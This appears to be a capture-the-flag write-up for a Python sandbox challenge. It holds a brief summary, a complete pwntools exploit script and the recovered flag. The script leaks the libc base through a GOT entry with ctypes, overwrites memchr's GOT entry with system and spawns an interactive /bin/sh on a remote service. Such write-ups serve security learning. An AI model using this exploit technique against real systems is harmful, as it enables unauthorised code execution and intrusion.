TL;DR: Use ctypes to load libc, leak its base, overwrite `memchr` GOT entry with `system`, call it via `input()`.

```
from pwn import *

LIBC_PATH = '/lib/x86_64-linux-gnu/libc.so.6' # Ubuntu 18.04
READ_GOT = 0xa002e0
MEMCHR_GOT = 0xa001a0

libc = ELF(LIBC_PATH)
if len(sys.argv) == 1:
s = process('python3.7 server.py', shell=True)
else:
s = remote('66.172.27.144', 9002)

commands = [
'ctypes.CDLL(input()).write(1, {}, 8)'.format(READ_GOT), # leak libc
'ctypes.CDLL(input()).read(0, {}, 8)'.format(MEMCHR_GOT), # overwrite memchr with system
'input()' # trigger a call to memchr
]

p = ','.join(commands).replace(' ', '')
s.sendlineafter('code: ', p)

# leak
s.sendline(LIBC_PATH)
libc.address = u64(s.recv().ljust(8, '\x00')) - libc.symbols['read']
print 'libc @ ' + hex(libc.address)

# overwrite
s.sendline(LIBC_PATH)
sleep(0.1) # make sure the payload arrives in separate packets
s.send(p64(libc.symbols['system']))

# exec
s.sendline('/bin/sh')

s.interactive()
```

Flag: `SUSEC{00f_i_f0rg0t_t0_unl0ad_ctypes}`